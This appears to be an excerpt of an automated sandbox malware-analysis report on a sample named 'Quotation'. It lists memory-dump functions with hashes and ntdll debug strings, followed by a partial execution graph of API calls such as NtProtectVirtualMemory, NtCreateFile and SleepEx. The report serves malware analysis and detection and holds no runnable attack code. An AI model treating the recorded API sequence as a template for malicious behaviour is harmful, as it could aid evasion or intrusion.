                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-3589223738
                                                              • Opcode ID: 9353bf897467db6c964def2aefe8d25da88700678201c0d1197ba1fa7b129f26
                                                              • Instruction ID: 82d79be81a51a424fd72d9fa148b6a74a9b987599c5643a0b212991395d5ff43
                                                              • Opcode Fuzzy Hash: 9353bf897467db6c964def2aefe8d25da88700678201c0d1197ba1fa7b129f26
                                                              • Instruction Fuzzy Hash: 5A512436B113589FDB04EBA8C854A9D77F6BB54308F88016AE450FF696DB709C45CB90
                                                              Function 33E7DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                              • API String ID: 3446177414-3224558752
                                                              • Opcode ID: d14886e77ea08fbeb842d3604482e5688ff374b65682adf41c010880bcec3626
                                                              • Instruction ID: acd118fcebf91581eab568ee286190a461ad2159e3f0b3743ceba77e550d3a17
                                                              • Opcode Fuzzy Hash: d14886e77ea08fbeb842d3604482e5688ff374b65682adf41c010880bcec3626
                                                              • Instruction Fuzzy Hash: 72419975A14744EFEB02DFA4C498B5AB7F4EF04368F0482A9E85197791CB34E882CBD1
                                                              Function 33EFF157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Entry Heap Size , xrefs: 33EFF26D
                                                              • ---------------------------------------, xrefs: 33EFF279
                                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 33EFF263
                                                              • HEAP: , xrefs: 33EFF15D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                              • API String ID: 3446177414-1102453626
                                                              • Opcode ID: 14d7a58068059a7685fe2fac237d522686431fa40d2013c45eea8e50926ec0f9
                                                              • Instruction ID: fbdc820100f41cb6064123b10a97d5af582c3b31f04248204f41a1aace8aae17
                                                              • Opcode Fuzzy Hash: 14d7a58068059a7685fe2fac237d522686431fa40d2013c45eea8e50926ec0f9
                                                              • Instruction Fuzzy Hash: 2441BC79A00615DFD704EF58C59090ABBF5FF8935876A82A9D408AB311D772EC43CB80
                                                              Function 33E7DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                              • API String ID: 3446177414-1222099010
                                                              • Opcode ID: 05e75a19e3f9f1f8c50a32ec88e576fe84409a6ba9e0fecc6b9c1cbf1ce37186
                                                              • Instruction ID: 7fc5098a0ec421fc59361107a04ce2715909be48eba280b1a3427dbfe3f75bc4
                                                              • Opcode Fuzzy Hash: 05e75a19e3f9f1f8c50a32ec88e576fe84409a6ba9e0fecc6b9c1cbf1ce37186
                                                              • Instruction Fuzzy Hash: 6E315635529BD4EFE712DBA4C808B467BF8EF01754F084184E49197B92CBB8E882CB61
                                                              Function 33E9B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 3f8faf1f79531c4e0e9e3037f51427a72fd5f463eb2c9f4668a43c3ce963660a
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 2C81C078E1534B9EFF148F68C8907EEBBB6AF49358F58425AD850A7391CB389840CB50
                                                              Function 33E59126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$@
                                                              • API String ID: 3446177414-1194432280
                                                              • Opcode ID: d585741035466c8863c769e9ef1ab45dfa2605a0b79e576645c78cdbc63801a7
                                                              • Instruction ID: b235525769388966c84bcc548102c7fd6a86ddc11c54a53c65064539ff745ed3
                                                              • Opcode Fuzzy Hash: d585741035466c8863c769e9ef1ab45dfa2605a0b79e576645c78cdbc63801a7
                                                              • Instruction Fuzzy Hash: 8A8139B5D003699BDB22CB54CD44BDEB7B8AF08754F0441EAE919B7680E7309E85CFA0
                                                              Function 33E7245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • TG3, xrefs: 33E72462
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EBA9A2
                                                              • LdrpDynamicShimModule, xrefs: 33EBA998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 33EBA992
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG3$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-896535992
                                                              • Opcode ID: 6c1212795cb4e4b988eb844778c52162204674514104435bba67fc16a7d774ce
                                                              • Instruction ID: 14990bdcf6f8d8b747e5e9d4b85f8d90e64a2ae35a72999c4bd2e6c2f0372e5a
                                                              • Opcode Fuzzy Hash: 6c1212795cb4e4b988eb844778c52162204674514104435bba67fc16a7d774ce
                                                              • Instruction Fuzzy Hash: 4A312D75A04301EFEF11AF58C950A5ABBF4FF94754F99005AF450B7251DB709982CBD0
                                                              Function 33E7F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 33EC02E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 33EC02BD
                                                              • RTL: Re-Waiting, xrefs: 33EC031E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: de3ff00218ebf6a52bcb507c7121b3cdcdbdb45751ca90ac4f48e57f27f524bd
                                                              • Instruction ID: c021cd3c2f6245ef3a9832c7bce2ce82c7ecf28263df54d317a4f8a0c32ea934
                                                              • Opcode Fuzzy Hash: de3ff00218ebf6a52bcb507c7121b3cdcdbdb45751ca90ac4f48e57f27f524bd
                                                              • Instruction Fuzzy Hash: BDE19D74614781DFE711CF28C980B5AB7F0BF84368F140A59E5A48B2E1DB78D946CB82
                                                              Function 33E4F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 3446177414-3610490719
                                                              • Opcode ID: 0f680d74e8b98ac556a2094d9171a3325f0cfb0b618082e0df3fa4ee9cdf8c66
                                                              • Instruction ID: b4ab9fb74ac1b23cca8861f41b6f72dcf6290ddcd658ee6d600d6dd31a57e141
                                                              • Opcode Fuzzy Hash: 0f680d74e8b98ac556a2094d9171a3325f0cfb0b618082e0df3fa4ee9cdf8c66
                                                              • Instruction Fuzzy Hash: 73910571A14741DFE315CF24D890B7AB7A8BF88E44F090659F9809B791DB34E842CBD2
                                                              Function 33E70BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • LdrpCheckModule, xrefs: 33EBA117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EBA121
                                                              • Failed to allocated memory for shimmed module list, xrefs: 33EBA10F
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-161242083
                                                              • Opcode ID: 92eca8d37b293f15f3baf1a4fa8004b92511aec3ce3a86d07d4175948222ea98
                                                              • Instruction ID: 172b277afd94d31370464058bfb409d545a15be175a15613d55833e9f3f43043
                                                              • Opcode Fuzzy Hash: 92eca8d37b293f15f3baf1a4fa8004b92511aec3ce3a86d07d4175948222ea98
                                                              • Instruction Fuzzy Hash: BC718D75E00305DFEB05DF68C990AAEBBF4EF44208F584469E455E7651E738ED42CB90
                                                              Function 33E79803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 3446177414-2283098728
                                                              • Opcode ID: 1f39c9e8d9fa9ed656a3fed84d5ef829001f2df20d4da775945e760c964547eb
                                                              • Instruction ID: 76e236ec23539a51b7d0f2ac605f0a1812dd9e698cfedc92dcd73a6b04980c71
                                                              • Opcode Fuzzy Hash: 1f39c9e8d9fa9ed656a3fed84d5ef829001f2df20d4da775945e760c964547eb
                                                              • Instruction Fuzzy Hash: C051F071A157029FF714DF24C884B6AB7B5BF84218F480A2DF8A59B691EB70E841CB81
                                                              Function 33E8B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 33EC728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 33EC72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 33EC7294
                                                              • RTL: Re-Waiting, xrefs: 33EC72C1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: e36e515ba17aeb5a6a9a810f92e58bfd32ab5531cf28ceed8f2e76d7d645ba19
                                                              • Instruction ID: c135b25450b0c3c26454e841e0dd40b162a6010a6c5c523aa30e94d8afb359c3
                                                              • Opcode Fuzzy Hash: e36e515ba17aeb5a6a9a810f92e58bfd32ab5531cf28ceed8f2e76d7d645ba19
                                                              • Instruction Fuzzy Hash: 994120B5A00746AFE714CE24CC41B5AB7B5FF84764F180619F8A8EB640EB20E806DBD0
                                                              Function 33ECEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: dee370146f7ce9a5cc0e239b98721fbf9d6c4daa21ef67b5a57cc8f1481b23a4
                                                              • Instruction ID: eac3a4ca0bebb774b8303722bd11f7fbaa9b557125cbdf129037d5582c38727f
                                                              • Opcode Fuzzy Hash: dee370146f7ce9a5cc0e239b98721fbf9d6c4daa21ef67b5a57cc8f1481b23a4
                                                              • Instruction Fuzzy Hash: 6A713675E003999FDF04CFA8CA80ADDBBB5BF48354F58412AE905FB259D734A906CB90
                                                              Function 33F2A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: ede55500ca11cb995e1fc5e787f552f8d6a080d029c23b76fee7a27a96b16009
                                                              • Instruction ID: a76c13eb22910aee6aec01a8fbff1c1448d52155c109f0fe4bc210232883f1a3
                                                              • Opcode Fuzzy Hash: ede55500ca11cb995e1fc5e787f552f8d6a080d029c23b76fee7a27a96b16009
                                                              • Instruction Fuzzy Hash: 9A516979710A12DFEF08CE58C4A2A1ABBF5FB89350B944A69D906DB710DF74EC41CB80
                                                              Function 33ECF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 2b9f1521a902e68a7c88f5e266a05c24b45d1bb86dbcaa21fa1e14da62b5891c
                                                              • Instruction ID: 8642eb18d3ce7bcdb113fa45af94fb3c86b42fb023042efa9b7052f1e91b32a3
                                                              • Opcode Fuzzy Hash: 2b9f1521a902e68a7c88f5e266a05c24b45d1bb86dbcaa21fa1e14da62b5891c
                                                              • Instruction Fuzzy Hash: E45134B5E00259EFDF08CF98DA41ADDBBB5BF48355F14822AE815BB254D734A902CF50
                                                              Function 33E87B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                              • String ID:
                                                              • API String ID: 4281723722-0
                                                              • Opcode ID: 1e9c485d9f5e3eaa96f975e868a22ba9318b61c6a98f3d00f46994cf408ff518
                                                              • Instruction ID: 8f08fbfe2665a885a803cd2455ed9714ec11cfb173b31d4832ac9496d459275d
                                                              • Opcode Fuzzy Hash: 1e9c485d9f5e3eaa96f975e868a22ba9318b61c6a98f3d00f46994cf408ff518
                                                              • Instruction Fuzzy Hash: C6312576E01218AFCF05EFA8C955A9EBBF0BB48720F10412AE422B7690DB359941CF94
                                                              Function 33E559C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: bb8822874106ab459ef4cb95f77ae9f7eaec2a1a23e21bfdaf6976cf8de487da
                                                              • Instruction ID: b9a7b0f5197d601548ec2d869c167295048dd534adbbfe2532c370c23c0e70ec
                                                              • Opcode Fuzzy Hash: bb8822874106ab459ef4cb95f77ae9f7eaec2a1a23e21bfdaf6976cf8de487da
                                                              • Instruction Fuzzy Hash: 9A324774D04369DFEB21CF64C984BDDBBB4BB08308F0441E9E559A7681DBB4AA84CF91
                                                              Function 33E504E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33E5063D
                                                              • kLsE, xrefs: 33E50540
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 3446177414-2547482624
                                                              • Opcode ID: 55c103a6b1d865d8ae508bf606bcaa2096536b5cad104b16292082436a652203
                                                              • Instruction ID: 1a9afacdc1e5ede6a0c91963df5a5d7c6ea3ad5a6fb2a26c463e773e33c8a315
                                                              • Opcode Fuzzy Hash: 55c103a6b1d865d8ae508bf606bcaa2096536b5cad104b16292082436a652203
                                                              • Instruction Fuzzy Hash: D951EFB55017468FE724DF24C440697B7F8AF84309F04483EF9AA87A40E778D945CF92
                                                              Function 33E4DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0$0
                                                              • API String ID: 3446177414-203156872
                                                              • Opcode ID: eb38bf7e2adb623754a154b02fbc111bf27826ed77d044050bd520db06243706
                                                              • Instruction ID: 6f86f30357978edee461f7479bc4b29290cc60796d0112e77279ee030bb57ee3
                                                              • Opcode Fuzzy Hash: eb38bf7e2adb623754a154b02fbc111bf27826ed77d044050bd520db06243706
                                                              • Instruction Fuzzy Hash: 01417CB1A087059FD310CF68D594A5BBBE8BB8C318F05492EF488DB351D771E905CB96

                                                              Execution Graph

                                                              Execution Coverage:1.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:419
                                                              Total number of Limit Nodes:14
                                                              execution_graph 13821 b137613 13823 b137620 13821->13823 13822 b137684 13823->13822 13824 b142e12 NtProtectVirtualMemory 13823->13824 13824->13823 13499 b142e12 13503 b141942 13499->13503 13501 b142e45 NtProtectVirtualMemory 13502 b142e70 13501->13502 13504 b141967 13503->13504 13504->13501 13881 b13bcd4 13883 b13bcd8 13881->13883 13882 b13c022 13883->13882 13887 b13b352 13883->13887 13885 b13bf0d 13885->13882 13896 b13b792 13885->13896 13889 b13b39e 13887->13889 13888 b13b58e 13888->13885 13889->13888 13890 b13b4ec 13889->13890 13892 b13b595 13889->13892 13891 b141232 NtCreateFile 13890->13891 13894 b13b4ff 13891->13894 13892->13888 13893 b141232 NtCreateFile 13892->13893 13893->13888 13894->13888 13895 b141232 NtCreateFile 13894->13895 13895->13888 13897 b13b7e0 13896->13897 13898 b141232 NtCreateFile 13897->13898 13900 b13b90c 13898->13900 13899 b13baf3 13899->13885 13900->13899 13901 b13b352 NtCreateFile 13900->13901 13902 b13b602 NtCreateFile 13900->13902 13901->13900 13902->13900 13790 b139dd9 13791 b139df0 13790->13791 13792 b13d382 ObtainUserAgentString 13791->13792 13793 b139ecd 13791->13793 13792->13793 13825 b143a1f 13826 b143a25 13825->13826 13829 b1375f2 13826->13829 13828 b143a3d 13830 b1375fb 13829->13830 13831 b13760e 13829->13831 13830->13831 13832 b13c662 2 API calls 13830->13832 13831->13828 13832->13831 13655 b1362dd 13658 b13631a 13655->13658 13656 b1363fa 13657 b136328 SleepEx 13657->13657 13657->13658 13658->13656 13658->13657 13662 b140f12 13658->13662 13671 b137432 13658->13671 13681 b1360f2 13658->13681 